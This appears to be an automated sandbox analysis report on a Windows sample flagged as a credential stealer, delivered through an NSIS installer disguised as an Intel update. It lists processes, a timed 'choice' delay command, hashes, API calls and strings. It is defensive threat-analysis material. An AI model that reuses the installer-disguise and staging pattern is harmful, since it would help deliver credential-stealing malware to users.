Path:	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com
Wow64 process (32bit):	true
Commandline:	Hugo.com y
Imagebase:	0xf10000
File size:	947'288 bytes
MD5 hash:	62D09F076E6E0240548C2F837536A46A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000003.2716593365.0000000001B41000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000003.2717609537.0000000001B41000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 0%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	09:45:18
Start date:	07/01/2025
Path:	C:\Windows\SysWOW64\choice.exe
Wow64 process (32bit):	true
Commandline:	choice /d y /t 5
Imagebase:	0x760000
File size:	28'160 bytes
MD5 hash:	FCE0E41C87DC4ABBE976998AD26C27E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	18.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	20.7%
Total number of Nodes:	1525
Total number of Limit Nodes:	33

Executed Functions

Function 004050CD Relevance: 68.5, APIs: 36, Strings: 3, Instructions: 295
windowclipboardmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDlgItem.USER32(?,00000403), ref: 0040512F
GetDlgItem.USER32(?,000003EE), ref: 0040513E
GetClientRect.USER32(?,?), ref: 00405196
GetSystemMetrics.USER32(00000015), ref: 0040519E
SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051BF
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051D0
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004051E3
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004051F1
SendMessageW.USER32(?,00001024,00000000,?), ref: 00405204
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405226
ShowWindow.USER32(?,00000008), ref: 0040523A
GetDlgItem.USER32(?,000003EC), ref: 0040525B
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040526B
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405280
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 0040528C
GetDlgItem.USER32(?,000003F8), ref: 0040514D

Part of subcall function 00403D98: SendMessageW.USER32(00000028,?,00000001,004057B4), ref: 00403DA6

Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

GetDlgItem.USER32(?,000003EC), ref: 004052AB
CreateThread.KERNELBASE(00000000,00000000,Function_00005047,00000000), ref: 004052B9
CloseHandle.KERNELBASE(00000000), ref: 004052C0
ShowWindow.USER32(00000000), ref: 004052E7
ShowWindow.USER32(?,00000008), ref: 004052EC
ShowWindow.USER32(00000008), ref: 00405333
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405365
CreatePopupMenu.USER32 ref: 00405376
AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 0040538B
GetWindowRect.USER32(?,?), ref: 0040539E
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053C0
SendMessageW.USER32(?,00001073,00000000,?), ref: 004053FB
OpenClipboard.USER32(00000000), ref: 0040540B
EmptyClipboard.USER32 ref: 00405411
GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 0040541D
GlobalLock.KERNEL32(00000000), ref: 00405427
SendMessageW.USER32(?,00001073,00000000,?), ref: 0040543B
GlobalUnlock.KERNEL32(00000000), ref: 0040545D
SetClipboardData.USER32(0000000D,00000000), ref: 00405468
CloseClipboard.USER32 ref: 0040546E

Strings

{, xrefs: 00405352
New install of "%s" to "%s", xrefs: 00405182
@rD, xrefs: 004053D7

Memory Dump Source

Source File: 00000000.00000002.2258505896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2258484932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258527944.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260018040.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_[UPD]Intel_Unit.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
String ID: @rD$New install of "%s" to "%s"${
API String ID: 2110491804-2409696222
Opcode ID: 71b8ecf663d6f058a1c3ced55927feebbdcf1e8b0d86afd2c4b352cd48bee751
Instruction ID: 480b9f2609884c7685ddca5963e0cfcc77f9e358d06567921943d8ab7e89b76b
Opcode Fuzzy Hash: 71b8ecf663d6f058a1c3ced55927feebbdcf1e8b0d86afd2c4b352cd48bee751
Instruction Fuzzy Hash: 14B15B70800608FFDB11AFA0DD85EAE7B79EF44355F00803AFA45BA1A0CBB49A519F59

Function 00403883 Relevance: 54.6, APIs: 22, Strings: 9, Instructions: 304
filestringcomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

#17.COMCTL32 ref: 004038A2
SetErrorMode.KERNELBASE(00008001), ref: 004038AD
OleInitialize.OLE32(00000000), ref: 004038B4

Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327

SHGetFileInfoW.SHELL32(00409264,00000000,?,000002B4,00000000), ref: 004038DC

Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016

GetCommandLineW.KERNEL32(0046ADC0,NSIS Error), ref: 004038F1
GetModuleHandleW.KERNEL32(00000000,004C30A0,00000000), ref: 00403904
CharNextW.USER32(00000000,004C30A0,00000020), ref: 0040392B
GetTempPathW.KERNEL32(00002004,004D70C8,00000000,00000020), ref: 00403A00
GetWindowsDirectoryW.KERNEL32(004D70C8,00001FFF), ref: 00403A15
lstrcatW.KERNEL32(004D70C8,\Temp), ref: 00403A21
DeleteFileW.KERNELBASE(004D30C0), ref: 00403A38
CoUninitialize.COMBASE(?), ref: 00403AD1
ExitProcess.KERNEL32 ref: 00403AF1
lstrcatW.KERNEL32(004D70C8,~nsu.tmp), ref: 00403AFD
lstrcmpiW.KERNEL32(004D70C8,004CF0B8,004D70C8,~nsu.tmp), ref: 00403B09
CreateDirectoryW.KERNEL32(004D70C8,00000000), ref: 00403B15
SetCurrentDirectoryW.KERNEL32(004D70C8), ref: 00403B1C
DeleteFileW.KERNEL32(004331E8,004331E8,?,00477008,00409204,00473000,?), ref: 00403B6D
CopyFileW.KERNEL32(004DF0D8,004331E8,00000001), ref: 00403B81
CloseHandle.KERNEL32(00000000,004331E8,004331E8,?,004331E8,00000000), ref: 00403BAE
GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C04
ExitWindowsEx.USER32(00000002,00000000), ref: 00403C40

Strings

NCRC, xrefs: 0040397C
NSIS Error, xrefs: 004038E2
/D=, xrefs: 004039A6
1C, xrefs: 00403B56
_?=, xrefs: 00403A64
SeShutdownPrivilege, xrefs: 00403C16
\Temp, xrefs: 00403A1B
~nsu.tmp, xrefs: 00403AF7
Error launching installer, xrefs: 00403A7D

Memory Dump Source

Source File: 00000000.00000002.2258505896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2258484932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258527944.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260018040.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_[UPD]Intel_Unit.jbxd

Similarity

API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp$1C
API String ID: 2435955865-239407132
Opcode ID: 5d9024d5f0e899f809313532158b428341dd342d07cfae74060de4bd372621f4
Instruction ID: 7cf1fa831aca86d96b8495533088dbe4cf0b0326274ef0a42366eb07f7c747b9
Opcode Fuzzy Hash: 5d9024d5f0e899f809313532158b428341dd342d07cfae74060de4bd372621f4
Instruction Fuzzy Hash: C4A1B671544305BAD6207F629D4AF1B3EACAF0070AF15483FF585B61D2DBBC8A448B6E

Function 00406805 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 212
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
GetSystemDirectoryW.KERNEL32(00462540,00002004), ref: 00406958

Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016

GetWindowsDirectoryW.KERNEL32(00462540,00002004), ref: 0040696B
lstrcatW.KERNEL32(00462540,\Microsoft\Internet Explorer\Quick Launch), ref: 004069E5
lstrlenW.KERNEL32(00462540,0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 00406A47

Strings

@%F, xrefs: 0040682C
\Microsoft\Internet Explorer\Quick Launch, xrefs: 004069DF
Software\Microsoft\Windows\CurrentVersion, xrefs: 00406926
@%F, xrefs: 00406A53

Memory Dump Source

Source File: 00000000.00000002.2258505896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2258484932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258527944.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260018040.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_[UPD]Intel_Unit.jbxd

Similarity

API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
String ID: @%F$@%F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 3581403547-784952888
Opcode ID: 93666727498e5f08fd38b631bc67a6e1ad40de3ecc08933b567c44a166c18943
Instruction ID: 7881bd453c5698e0e02013fa1c3524f2cf467b60749c67c5a59258f73e57ab2a
Opcode Fuzzy Hash: 93666727498e5f08fd38b631bc67a6e1ad40de3ecc08933b567c44a166c18943
Instruction Fuzzy Hash: F171F4B1A00215ABDB20AF28CD44A7E3771EF55314F12C03FE906B62E0E77C89A19B5D

Function 004074BB Relevance: 5.4, APIs: 4, Instructions: 382COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2258505896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2258484932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258527944.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260018040.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_[UPD]Intel_Unit.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
Instruction ID: b44593247c4c050b0e646bb53675e7b1a8962b0b92449cff70e8ee1879f4dc4f
Opcode Fuzzy Hash: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
Instruction Fuzzy Hash: 00F14871908249DBDF18CF28C8946E93BB1FF44345F14852AFD5A9B281D338E986DF86

Function 004062FC Relevance: 4.5, APIs: 3, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
GetProcAddress.KERNEL32(00000000), ref: 00406327

Memory Dump Source

Source File: 00000000.00000002.2258505896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2258484932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258527944.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260018040.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_[UPD]Intel_Unit.jbxd

Similarity

API ID: AddressHandleLibraryLoadModuleProc
String ID:
API String ID: 310444273-0
Opcode ID: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
Instruction ID: 23f85fcbdf3119ad7ff9d94b99dcad510d7c567b01d836bd9cab37df641e0753
Opcode Fuzzy Hash: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
Instruction Fuzzy Hash: 53D0123120010597C6001B65AE0895F776CEF95611707803EF542F3132EB34D415AAEC

Function 004062D5 Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
FindClose.KERNEL32(00000000), ref: 004062EC

Memory Dump Source

Source File: 00000000.00000002.2258505896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2258484932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258527944.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260018040.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_[UPD]Intel_Unit.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
Instruction ID: 3dd5e1b78c12f0f437ff376ab6b0e1f90f8becb0d3509d6a9a7f52ed6ae53baf
Opcode Fuzzy Hash: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
Instruction Fuzzy Hash: 7AD0C9315041205BC25127386E0889B6A589F163723258A7AB5A6E11E0CB388C2296A8

Function 00405479 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054B5
ShowWindow.USER32(?), ref: 004054D2
DestroyWindow.USER32 ref: 004054E6
SetWindowLongW.USER32(?,00000000,00000000), ref: 00405502
GetDlgItem.USER32(?,?), ref: 00405523
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405537
IsWindowEnabled.USER32(00000000), ref: 0040553E
GetDlgItem.USER32(?,00000001), ref: 004055ED
GetDlgItem.USER32(?,00000002), ref: 004055F7
SetClassLongW.USER32(?,000000F2,?), ref: 00405611
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00405662
GetDlgItem.USER32(?,00000003), ref: 00405708
ShowWindow.USER32(00000000,?), ref: 0040572A
KiUserCallbackDispatcher.NTDLL(?,?), ref: 0040573C
EnableWindow.USER32(?,?), ref: 00405757
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040576D
EnableMenuItem.USER32(00000000), ref: 00405774
SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040578C
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040579F
lstrlenW.KERNEL32(00447240,?,00447240,0046ADC0), ref: 004057C8
SetWindowTextW.USER32(?,00447240), ref: 004057DC
ShowWindow.USER32(?,0000000A), ref: 00405910

Strings

@rD, xrefs: 004057B9

Memory Dump Source

Source File: 00000000.00000002.2258505896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2258484932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258527944.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260018040.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_[UPD]Intel_Unit.jbxd

Similarity

API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
String ID: @rD
API String ID: 3282139019-3814967855
Opcode ID: 9cf786e25966daeabf755d20ab7dea7749e4d7b73da7bae0acc5cbd00c8c4fee
Instruction ID: 0f9b988f21b44e482dc064b3562f20aa73efc2902ac8c6ffeb9ddf27563d0ddb
Opcode Fuzzy Hash: 9cf786e25966daeabf755d20ab7dea7749e4d7b73da7bae0acc5cbd00c8c4fee
Instruction Fuzzy Hash: D8C1C371500A04EBDB216F61EE49E2B3BA9EB45345F00093EF551B12F0DB799891EF2E

Function 004015A0 Relevance: 56.4, APIs: 15, Strings: 17, Instructions: 351
sleepfilewindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostQuitMessage.USER32(00000000), ref: 00401648
Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
SetForegroundWindow.USER32(?), ref: 004016CB
ShowWindow.USER32(?), ref: 00401753
ShowWindow.USER32(?), ref: 00401767
SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
SetCurrentDirectoryW.KERNELBASE(?,004CB0B0,?,000000E6,0040F0D0,?,?,?,000000F0,?,000000F0), ref: 00401885
MoveFileW.KERNEL32(00000000,?), ref: 00401908
GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,0040F0D0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
SearchPathW.KERNELBASE(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE

Strings

Rename: %s, xrefs: 004018F8
Aborting: "%s", xrefs: 0040161D
CreateDirectory: "%s" created, xrefs: 00401849
CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
Sleep(%d), xrefs: 0040169D
SetFileAttributes failed., xrefs: 004017A1
SetFileAttributes: "%s":%08X, xrefs: 0040177B
Jump: %d, xrefs: 00401602
CreateDirectory: "%s" (%d), xrefs: 004017BF
Rename on reboot: %s, xrefs: 00401943
BringToFront, xrefs: 004016BD
IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
Rename failed: %s, xrefs: 0040194B
detailprint: %s, xrefs: 00401679
CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
Call: %d, xrefs: 0040165A

Memory Dump Source

Source File: 00000000.00000002.2258505896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2258484932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258527944.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260018040.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_[UPD]Intel_Unit.jbxd

Similarity

API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
API String ID: 2872004960-3619442763
Opcode ID: e7226c198396c3fe3a7f3bea8c4d52a2e846d2bb9e79691e18455936b93e1c7d
Instruction ID: b6b48939bc8a7188504c618ab7841b31fdd5898bf24c808f75461ec369738802
Opcode Fuzzy Hash: e7226c198396c3fe3a7f3bea8c4d52a2e846d2bb9e79691e18455936b93e1c7d
Instruction Fuzzy Hash: 0AB1F471A00204ABDB10BF61DD46DAE3B69EF44314B21817FF946B21E1DA7D4E40CAAE

Function 0040592C Relevance: 45.7, APIs: 15, Strings: 11, Instructions: 233
stringregistrylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327

lstrcatW.KERNEL32(004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006,004C30A0,-00000002,00000000,004D70C8,00403AC1,?), ref: 004059AE
lstrlenW.KERNEL32(00462540,?,?,?,00462540,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006,004C30A0), ref: 00405A30
lstrcmpiW.KERNEL32(00462538,.exe,00462540,?,?,?,00462540,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000), ref: 00405A43
GetFileAttributesW.KERNEL32(00462540), ref: 00405A4E

Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E

LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004C70A8), ref: 00405AB7
RegisterClassW.USER32(0046AD60), ref: 00405B0A
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B22
CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B5B

Part of subcall function 00403E95: SetWindowTextW.USER32(00000000,0046ADC0), ref: 00403F30

ShowWindow.USER32(00000005,00000000), ref: 00405B91
LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BA2
LoadLibraryW.KERNEL32(RichEd32), ref: 00405BAD
GetClassInfoW.USER32(00000000,RichEdit20A,0046AD60), ref: 00405BBD
GetClassInfoW.USER32(00000000,RichEdit,0046AD60), ref: 00405BCA
RegisterClassW.USER32(0046AD60), ref: 00405BD3
DialogBoxParamW.USER32(?,00000000,00405479,00000000), ref: 00405BF2

Strings

RichEdit, xrefs: 00405BC4
RichEd20, xrefs: 00405B9D
@%F, xrefs: 004059F6
Control Panel\Desktop\ResourceLocale, xrefs: 00405972
_Nb, xrefs: 00405AD1
.DEFAULT\Control Panel\International, xrefs: 00405999
.exe, xrefs: 00405A3D
@rD, xrefs: 00405965
RichEd32, xrefs: 00405BA8
RichEdit20A, xrefs: 00405BB6, 00405BBB
B%F, xrefs: 00405A1F

Memory Dump Source

Source File: 00000000.00000002.2258505896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2258484932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258527944.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258547832.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
